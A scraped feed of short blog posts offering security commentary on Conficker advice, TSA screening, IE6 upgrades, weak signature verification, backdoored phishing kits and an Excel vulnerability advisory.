As if we don’t have enough FUD already, we have some genius at ABC news advising how to make your computer less secure.
If you don’t purchase the software you could also save your files to an external hard drive and be sure turn off any automatic updates until this super worm is killed.
Wow, that’s special. I’m wondering if whoever the technical adviser was for that article isn’t on Conflicker’s payroll? See, Conflicker spreads in three ways:
So the correct course of action is to do the exact opposite of what ABC suggests: Turn on automatic updates, make sure you’re up to date right now, then scan your external hard drives before trusting them.
And then of course there is this little gem:
“Well the best thing a customer can do is purchase a Norton 360, what it will do is give you complete virus protection it also spyware and adware..in addition it gives you two gigabytes of online backup so you could put your files on a backup server”, said Luke Rider, Manager of Staples.
Because when I think “security consultant”, the first thing I do is go to my nearest Staples store and ask for the manager.
]]>Here we are in 2009 and the best the TSA presents to us on their blog is that they finally cause one piece of contraband, a bottle of lotion.
I think I’m going to go ahead and agree with the TSA’s own comment: “Thank the heavens for the TSA. Without them, a harmless bottle of lotion would have made it onto an airplane”
Good job TSA.
]]>Here we are, two years after Internet Explorer 7 was released, at least a year since Internet Explorer 7 was pushed out as an automatic upgrade, and some ~30% of people are still using it. Heck, we’re all but on the cusp of IE8’s release, and some people are still stuck in the past with IE6!
This upgrade lag is simply unacceptable, especially to all of the web developers out there who are busy creating the content that feeds the monster you the internet.
So what’s the problem? Well, it is a real pain to make sure your Web apps work on five different browsers, but that’s just part of the game. Adding a sixth is a minor annoyance you say? Well actually no, it’s a huge pain! See, you can’t have IE6 installed on the same machine as a later IE version, so I’m stuck using an entirely separate machine that exists only for Internet Explorer 6 just to test minor site changes in IE6.
Not only that, but IE6 “supports” some non-standard features and functions that are not compatible with other browsers, and has a ton of CSS and even JavaScript incompatibilities, so things that should be dead simple in every other browser are a huge pain in IE6. The security vulnerabilities aren’t too much fun either.
For the manager types who need a bullet point list, okay, here it is. There are many reasons to upgrade your browser, but here are the most pertinent:
If you are a web developer you already know many of the headaches associated with Internet Explorer 6, so I’d encourage you to do what you can do encourage users to upgrade.
So, upgrade to what? There are a ton of alternatives to Internet Explorer 6, with the most popular browsers, all available for free, being listed below (in order of my personal preference):
So please, upgrade!
For those unfortunate souls still running Internet Explorer 6, I’ve added a handy annoying reminder to get a better browser. I’m trying to be nice, so I made it only appear on the main page, you can still wander around the site without too much pain, but please, if you see the reminder, it’s there for your own good as well as for mine.
]]>There is a smoke/fire alarm in the kitchen. And not just any detector, it’s a super sensitive one! Note to the developer who made the decision to place it here: Don’t.
See, catching kitchen fires early is a good idea in theory, but in the real world, I’m sure my neighbours are tired of hearing about it every time I make toast, or in a spectacular example of stupidity in design, it went off earlier today when I was melted butter in the microwave, and the butter wasn’t even melted yet.
]]>I’m not talking about that blurb on the bottom of an email containing a joke, quip or quote or meaningless unenforceable legal disclaimer, but a pen to paper, might-be-worth-something-if-I-get-famous John Hancock.
Cashiers don’t confirm them when using a credit card, this is easily tested — Write “Homer Simpson” on the signature line of a Visa receipt and see if anyone notices. Even the ones that make a big show of comparing your receipt to your card don’t notice, it’s robotic, and like most things in the security world, it’s theatre.
Even more useless are signatures on faxes. I regularly fill out or create documents electronically which I am supposed to print, sign, and then either fax or mail to a company. I don’t. I have a scanned copy of my signature which I can insert into a document before printing or faxing, and haven’t once been called on it — Why would I be, it looks completely legitimate to the recipient.
And that, right there, is the problem. How is the recipient supposed to verify that the signature belongs to me? If it can’t be authenticated, how does the recipient know it’s authorized? And if it’s not authorized, what good is it?
With 15 minutes to dummy up letterhead you can get ownership to all sorts of things, from domain names to packages at the post office to using someone’s credit card, or occasionally, even initiating a wire transfer.
Cheques are not verified, unless the cheque is large or otherwise suspicious an unsigned cheque will go through without any pain — Sure, you could dispute it, and probably get your money back, but a smart thief would be long gone before anyone noticed.
Now admittedly this is not a trivial problem to solve, and in fact it would probably take multiple layers depending on the value of the transaction, whether or not the parties are able to connect physically, and the likelihood of fraud.
Fast food is starting to get it right, no signature required for small purchases.
Some stores always ask for identification for credit card transactions, but rarely ask you to remove your ID from your wallet — Even Alberta’s rather impressively difficult to modify or reproduce, polycarbonate laser engraved identification cards defeated if the clerk isn’t paying attention — Just paste a new picture on top and no one will notice IF the card is only inspected through a plastic holder inside a wallet. I’ve yet to be asked to remove the card from my wallet anywhere except when applying for a passport.
Weird that we trust a signature so implicit, is it not?
]]>All non-Europeans would need to submit biometric data before crossing Europe’s frontiers under sweeping European Union proposals to combat illegal migration, terrorism and organized crime that are to be outlined this week.
Well isn’t that fantastic. It’s a good thing no terrorist or organized crime family would ever be able to obtain a European passport. And heck, if you can’t be bothered to purchase false identification, why bother with this at all, just skip immigration and head straight for the street.
]]>I don’t even know where to start with this story. The terrorists have won. Here are the facts as we know them; undisputed by Homeland Security at this time.
Baby flies to America for life saving surgery. Baby is a naturalized American citizen. Baby has valid papers. Baby’s nurse has valid papers. Neither set of paperwork is in question. Baby was detained and left in a locked room. Request for medical assistance was ignored, except for a “Stay calm, relax” response. Baby dies.
The officers have some questions about the mother’s paperwork, although it appears that everything is valid. The US Customs and Border Protection stamp of “APPROVAL” didn’t fool anyone, nor did the suggestion that the baby and nurse (both already cleared) could proceed to the hospital while the mother deals with whatever additional paperwork makes homeland security feel their job is worthwhile.
I’d like to take this opportunity to thank each and every member of the TSA, Homeland Security, and their associated areas. Sure, you don’t stop bombs or guns, you deport your own citizens, sometimes you even catch people playing dress-up, and now, you kill babies, you sure do a bang-up job of security.
]]>We can now add guns to the list of things that the TSA doesn’t worry about finding.
So what do they do when their error is pointed out? Why arrest the guy who brought it to their attention, of course.
But shampoo? They’ve got that one down.
So tell me, if you discovered you were carrying a weapon after you were through security, what would you do? How about if you stumbled across something suspicious inside security? What does the TSA teach is the correct response?
]]>From NetCraft, Phishing kits take advantage of novice fraudsters
However, while the phishing kit is easy to use, an encrypted component within the kit is used to send a copy of the captured details to an additional gmail address, which belongs to the author. This will not be obvious to most fraudsters using the kit, as the relevant code is detached from the configuration file and is heavily obfuscated, requiring some effort to decode
And another article from Netcraft, and one from The Register
]]>According to Microsoft, there are several mitigating Factors:
• | This vulnerability cannot be exploited on Microsoft Office Excel 2003 Service Pack 3, Microsoft Office Excel 2007, Microsoft Office Excel 2007 Service Pack 1, or Microsoft Excel 2008 for Mac. |
• | Customers who are running Microsoft Office Excel 2003 Service Pack 2 and have deployed Microsoft Office Isolated Conversion Environment (MOICE) are not affected by this vulnerability. |
• | The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful a user must open an attachment that is sent in an e-mail message. |